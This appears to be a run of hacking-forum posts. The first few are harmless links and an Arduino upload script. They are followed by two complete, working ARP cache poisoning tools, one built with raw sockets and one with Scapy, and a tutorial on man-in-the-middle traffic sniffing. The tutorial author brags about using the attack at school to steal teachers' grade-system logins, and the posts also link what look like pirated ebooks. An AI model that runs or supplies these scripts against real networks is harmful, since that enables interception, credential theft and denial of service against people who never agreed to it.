EvilZone

I mentioned an  idea  about a programming language based on Donald Trump in IRC a while ago.  Well, in the true American spirit I did nothing and waited for someone else to do it for me. So aftet months of labor,  here is what they came up with. Let's make code great again.

http://devpost.com/software/trumpscript

I found this on Reddit, it's one of them libs that you never knew you wanted until you see it.

https://pypi.python.org/pypi/tqdm

The snow effect was murdering my laptop every time I came here. Instead of continuing to bitch about evilzone.org/snow.js I made it stop.

I use uBlock, and I'm sure the other ad blockers will work just the same. All you need to do is add
evilzone.org/snow.js to your filter list and no more snow. As for mobile idk. I haven't had any issues on my mobile since the script seems to be polling for the mouse or something and with a touch display it doesn't seem to be as bad.

Anyway, there it is. No more snow, or if you like it this is where it came from.
http://www.schillmania.com/projects/snowstorm/

Found this via reddit. One of them golden nuggets you find only like once every few months or so.

https://github.com/NARKOZ/hacker-scripts

I wrote this script to compile and upload an Arduino sketch because I don't like nor use the Arduino IDE. I can use my editor of choice now and not need to fire up the Arduino IDE just to upload my new firmware.

I do this by, at the top of my sketches making two comments that describe the board and serial port to use, and calling Arduino from the command line to compile it and upload it for me. I might add this to my editor I use for convenience if I feel spunky, but for now I just made it executable and plopped it in /usr/bin.

The script arduload.py:
#! /usr/bin/python

# arduload.py
# By: Techb
# Date: Aug 26, 2015
# A script to compile and load arduino sketchs.
# This will check and make sure the tty is avail.
# In your sketch you need to have two comments at the
# the top of your file, example:
#     // --board arduino:avr:uno
#     // --port /dev/ttyUSB0
# --board, you will need the board your using.
# --port, is where your serail com is.
# Linux only, I don't plan to add Windows support
# since I don't use or have Windows. Feel free to add support.
# Tested on Arch Linux 4.1.5, Python 3.4.3

# Find more here: https://github.com/arduino/Arduino/blob/master/build/shared/manpage.adoc

import sys
import os

def usage():
    print("[??] Example: python arduload.py <file>")

def test_dev(p):
    tty = p.split("/")[-1]
    ld = os.listdir("/dev")
    if tty in ld:
        print("[+] Found %s, continuing." % p)
    else:
        print("[-] Port %s not found, try another..." % p)
        sys.exit("[!] Exiting...")

if len(sys.argv) < 2:
    usage()
    sys.exit()
else:
    sketch = sys.argv[1]

try:
    with open(sketch, "r") as fd:
        fl = [l for l in fd.readlines()]
        if "--board" in fl[0] and "--port" in fl[1]:
            board = fl[0].strip().split("--board")[-1].strip()
            print("[+] Using board %s" % board)
            # test the port
            port = fl[1].strip().split("--port")[-1].strip()
            test_dev(port)
            os.system("arduino --board %s --port %s --upload %s" % (board, port, sketch))
            print("[+] Done.")

except FileNotFoundError:
    print("[!] File not found. Try again.")
    usage()
    print("[!] Exiting...")

Example sketch:
// --board arduino:avr:uno
// --port /dev/ttyUSB0

/*
  Blink
  Turns on an LED on for one second, then off for one second, repeatedly.

  Most Arduinos have an on-board LED you can control. On the Uno and
  Leonardo, it is attached to digital pin 13. If you're unsure what
  pin the on-board LED is connected to on your Arduino model, check
  the documentation at http://www.arduino.cc

  This example code is in the public domain.

  modified 8 May 2014
  by Scott Fitzgerald

  modified 23 Aug 2015
  by techb
  adapted to be SOS
 */

// dickbutt: -.. .. -.-. -.- -... ..- - -
// SOS: ... --- ...

// the setup function runs once when you press reset or power the board
void setup()
{
  // set baud rate
  Serial.begin(9600);
  // set pin 13 to output. Thre is an onboard LED attached.
  pinMode(13, OUTPUT);
  // set LED to low or off
  digitalWrite(13, LOW);
}

// the loop function runs over and over again forever
void loop()
{
  sos();
}

void sos()
{
  // SOS in morse code
  char txt[] = "-.. .. -.-. -.- -... ..- - -";

  // start SOS sequence
  for (int i= 0; i <= strlen(txt); i++)
  {
    if (txt[i] == '-')
    {
      digitalWrite(13, HIGH);
      delay(600);
      digitalWrite(13, LOW);
      delay(500);
    }
    else if (txt[i] == '.')
    {
      digitalWrite(13, HIGH);
      delay(100);
      digitalWrite(13, LOW);
      delay(500);
    }
    else
    {
      digitalWrite(13, LOW);
      delay(500);
    }
  }
  delay(1000);
}


Not much get's posted to this board, so when I seen this, I had to link it here.

I haven't really done much FPGA [Field Programmable Gate Array] mostly because I can't just go and buy a bunch of shit to start messing around with. FPGA, for those who have never heard the term is basically using configuring your own hardware logic to a chip. Or, eli5, make your own cpu's and other such things.

This site lets you simulate and play around with it in your browser, no downloads or anything, just open it up and start messing about with logic. The digital frontier of bare metal.

found on hackaday btw
http://www.edaplayground.com/

This is a script to poison the ARP table using raw sockets. It requires Linux, and specifically at or greater than Linux 2.0. Windows simply can not do this with this script. This is an example on building packets by hand in binary form and sending to the driver at Layer 2 (network), skipping Layer 3 (ip) all together using PF_PACKET and raw sockets.

=-=-=-EDIT-=-=-=

The code is working now. The reason it wasn't before was because of using .upper() on the mac address conversions.
binascii.unhexlify(''.join(vmac.split(':'))).upper()It was applying the upper method to the binary string. I removed it and it is working. With further testing I found out the mac address could use upper case or lower case hex chars, but have converted them to lower case before converting to binary form. Only because I plan on extending the script and want consistency. I/you can make them upper case before the conversion, but with error testing it is easier to read in lower case for me.

Anyway, code is working like a charm now. Usage:
[techb@techb_media Python]$ sudo python2 arpraw.py -h
usage: arpraw.py [-h] -vm VICTIMMAC -vi VICTIMIP -tm TARGETMAC -ti TARGETIP
                 [-d DELAY]

ARP poison using raw sockets

optional arguments:
  -h, --help            show this help message and exit
  -vm VICTIMMAC, --victimmac VICTIMMAC
                        Victim MAC address
  -vi VICTIMIP, --victimip VICTIMIP
                        Victim IP address
  -tm TARGETMAC, --targetmac TARGETMAC
                        Target MAC address [gateway]
  -ti TARGETIP, --targetip TARGETIP
                        Target IP address [gateway]
  -d DELAY, --delay DELAY
                        Delay in seconds between sending packets [optional]

#! /usr/bin/python2

# ARP poison example using raw packets
#   instead of scapy. Note that this is
#   very noisey. Any half brained admin
#   would notice the arp activity.
# victim == the computer we want to sniff
# target == default gateway (in most cases)
# Written by: techb
# Date: May 28 2015
# Python: Version 2.7
# OS dev on: Arch Linux
# License: None, script is public domain,  but at
#   least credit me if you share this.
# This script is presented 'as is' and the author
#   is not responsible for misuse or errors you may get.

import binascii
import socket
import time
import argparse

def getInterfaces():
'''This function is not used here, but if you
   don't know what interface you want to use
   or the name of it. Since I'm on Arch they
   decided it would be a good idea to make simple
   interface names all fuckey '''
# NEVER import inside a function or method
# I put it here incase you used the function
#   to show you need these libs for it.
import os, re
raw = os.popen("ip link show").read()
interface = re.findall(r"\d: \w+:", raw)
ilist = []
for i in interface:
ilist.append(i[:-1])
return ilist

def getOwnMac(interface):
'''Uhhhh, gets my own mac address.'''
fd = open("/sys/class/net/%s/address" % interface , "r")
mac = fd.read()
fd.close()
return mac.strip()

def buildPoison(victim, target, mymac):
    '''builds the custom packet used to poison
       the arp cache. Arguments should be tuples
       comtaining the ip and mac. (ip, mac)'''
    vip = victim[0]
    vmac = victim[1].lower()
    tip = target[0]
    tmac = target[1].lower()
 
    # create binary values to be sent on wire
    # the mac addr conversons are very ugly but work =)
    vip = socket.inet_aton(vip)
    vmac = binascii.unhexlify(''.join(vmac.split(':')))
    tip = socket.inet_aton(tip)
    tmac = binascii.unhexlify(''.join(tmac.split(':')))
    mymac = binascii.unhexlify(''.join(mymac.split(':')))

    # build ethernet headers
    pcode = '\x08\x06' #ARP code for eth header
    veth = vmac+mymac+pcode
    teth = tmac+mymac+pcode

    # build arp headers
    htype = '\x00\x01' # we're on ethernet
    proto = '\x08\x00' # intended protocol, which is ipv4
    hsize = '\x06' # mac addr size
    psize = '\x04' # ip addr size
    opcode = '\x00\x02' # arp option code, 2 is reply
    arp = htype+proto+hsize+psize+opcode

    # build spoofed portion of arp header
    vspoof = mymac+tip+vmac+vip # victim
    tspoof = mymac+vip+tmac+tip # target

    # build final packets
    vpacket = veth+arp+vspoof
    tpacket = teth+arp+tspoof

    return (vpacket, tpacket)

def main(v_mac, t_mac, delay=2):
    '''Main loop. Can pass a delay argument, defaults to 2 seconds.'''
    interface = 'enp2s0' #yours will probably be diff
    my_mac = getOwnMac(interface)
    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
    s.bind((interface, socket.htons(0x0800)))
    packets = buildPoison(v_mac, t_mac, my_mac)
    print "Poisoning..."
    while True:
        s.send(packets[0])
        s.send(packets[1])
        time.sleep(delay)

if __name__ == '__main__':
    ap = argparse.ArgumentParser(description="ARP poison using raw sockets")
    ap.add_argument("-vm", "--victimmac", help="Victim MAC address", required=True)
    ap.add_argument("-vi", "--victimip", help="Victim IP address", required=True)
    ap.add_argument("-tm", "--targetmac", help="Target MAC address [gateway]", required=True)
    ap.add_argument("-ti", "--targetip", help="Target IP address [gateway]", required=True)
    ap.add_argument("-d", "--delay", help="Delay in seconds between sending packets [optional]", type=float)
    args = ap.parse_args()
   
    if args.delay:
        main((args.victimip, args.victimmac), (args.targetip, args.targetmac), delay=args.delay)
    else:
        main((args.victimip, args.victimmac), (args.targetip, args.targetmac))


In response to the guy complaining about people not teaching, and partly because I've been bored at work, here is a tutorial on using python to ARP cache poison on a local network.

I am using Arch linux and Python 2.7

Intro to ARP

Before we jump into the code you need to understand what ARP is, what it does and the structure of it's packets. ARP stands for Address Resolution Protocol. The function of it is to associate an IP address with its MAC address. The reason we need the MAC in the first place is because layer 2 [data link] of the osi model communicates via MAC addresses.

It is silly to send out an ARP request every time you needed to reach another device, so that is where the ARP table comes in. The table is a cache of IP addresses and their associated MACs. When you want to send info or connect to something, the computer checks its ARP table if it has the IP and MAC already, if so it sends off the data.

Normally an ARP transaction starts with a request, then it gets a response. But the funny thing, and why this attack works, is you can send a reply even though no request was sent. The computer sees the reply and reacts like it sent a request, even though it didn't, and updates the ARP table anyway.

But Why?

You might be wondering why we would want to do this in the first place. Well, every device communicates on layer 2, including your router or default gateway. So if you forge an ARP reply to look like it came from the gateway with your personal MAC address, you will now receive all layer 2 traffic from the target that was meant for the gateway.

This is what is known as a Man in the Middle attack or MitM. If you forward the traffic to the gateway you are now sitting between the target and the internet effectively sniffing their traffic. You can see where they are going, you could sniff plain text usernames and passwords, emails, irc, etc... I've even used this in school to grab login details from teachers for the program they use to log grades and such. You can DoS people by not forwarding their traffic. There is a lot you can do here.

Digging Further

Here is a visual of an ARP header:


Hardware type: Is what we are sending on, our case is Ethernet, but there are others such as IEEE 802, Serial Line, LocalTalk, etc.. Can find more here 16 bits
Protocol Type: Is IP. 16 bits
HW addr lth: Hardware address length is. 8 bits [MAC address lenght]
P addr lth: Protocol address length is. 8 bits [IP address]
Opcode: Defines request or response. 16 bits
The last four are self explainatory.

We could use raw sockets and build the ethernet frame and arp header by hand, but there are easier ways. I might eventually write another tutorial or post a snippet of doing this, but for now we are only talking about ARP poisoning. So now onto the code.

Le Code

I am using Python 2.7 and you will need to install Scapy
pip2 install scapy
#! /usr/bin/python2

# I guess scapy requires tcpdump to rid
#  fucking runtime log warnings... :/
#  pacman -S tcpdump

# ip forrwarding until reboot
#  sysctl net.ipv4.ip_forward=1
#  echo 1 > /proc/sys/net/ipv4/ip_forward

# scapy == women, use logging to stop it from
#  yelling at you over stupid shit
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import *
import time, sys, os, re

# get mac from an ip on lan via icmp
#  you can use ARP to get it, but that
#  can be your homework assignment
def getRemoteMac(target):
ping = IP(dst=target)/ICMP()
ping_reply = sr1(ping,verbose=0,timeout=2)
if not ping_reply:
print "No reply, invalid target. Suicide?"
sys.exit()
else:
cmd_response = os.popen("arp -n '%s'" % target).read()
mac = re.search(r"\w+:\w+:\w+:\w+:\w+:\w+", cmd_response)
mac = mac.group() #should only be one motherfucker
return mac

# Linux only, Windows users have another homework assignment here
def getOwnMac(interface):
fd = open("/sys/class/net/%s/address" % interface , "r")
mac = fd.read()
fd.close()
return mac.strip()

# Could expand to see which interface is UP or DOWN
#  also could use to get local mac address as well
#  more homework you lazy cunt, lol
def getInterfaces():
raw = os.popen("ip link show").read()
interface = re.findall(r"\d: \w+:", raw)
for i in interface:
print i[:-1]

op = 2 #op code for ARP reply, 1 is a request

# Get required info. Could just use argvs
#  but I like the interactivity
getInterfaces()
interface = str(raw_input("Interface: "))
victim_ip = str(raw_input("Victim IP: "))
gateway_ip = str(raw_input("Gateway IP: "))
own_mac = getOwnMac(interface)

# genorate target arp header
arp = ARP(op=op,
          psrc=gateway_ip,
          pdst=victim_ip,
          hwdst=own_mac)

# Start cache poisen. I don't have any
#  graceful closures because I'm an asshole.
#  A gentalmen would catch a ctrl+c and
#  revert the ARP tables. Meh.
print "running..."
while True:
send(arp, verbose=0)
time.sleep(1.5)

Most of this is helping functions and comments. The only real relevant part is at the end. You only really need 2 or three lines of code if you hard code the options like the ip addresses and mac addresses. The comments should explain the code well enough so I'm not going to write a line by line explanation here.

You can also run Scapy interactively which has a built-in arp poison method.
arpcachepoison("your ip", "target ip")


Ref Material
Sites:
http://www.networksorcery.com/enp/protocol/arp.htm
https://en.wikipedia.org/wiki/Address_Resolution_Protocol
https://en.wikipedia.org/wiki/ARP_spoofing

Scapy:
http://www.secdev.org/projects/scapy/doc/usage.html
http://www.secdev.org/projects/scapy/demo.html
http://packetlife.net/blog/2011/may/23/introduction-scapy/

Books:
http://evilzone.org/ebooks/python-penetration-testing-essentials-2015/?action=dlattach;attach=5476
http://upload.evilzone.org/?page=download&file=BNXpJhMfUFQxXwH6a0bb03ASN8wT0fkZ2wNX6aWYfhr2ZZ7mfu
http://evilzone.org/ebooks/understanding-network-hacks-attack-and-defense-with-python-2015/?action=dlattach;attach=5475

Example using raw sockets:
https://evilzone.org/scripting-languages/%28python%29arp-poison-using-raw-sockets/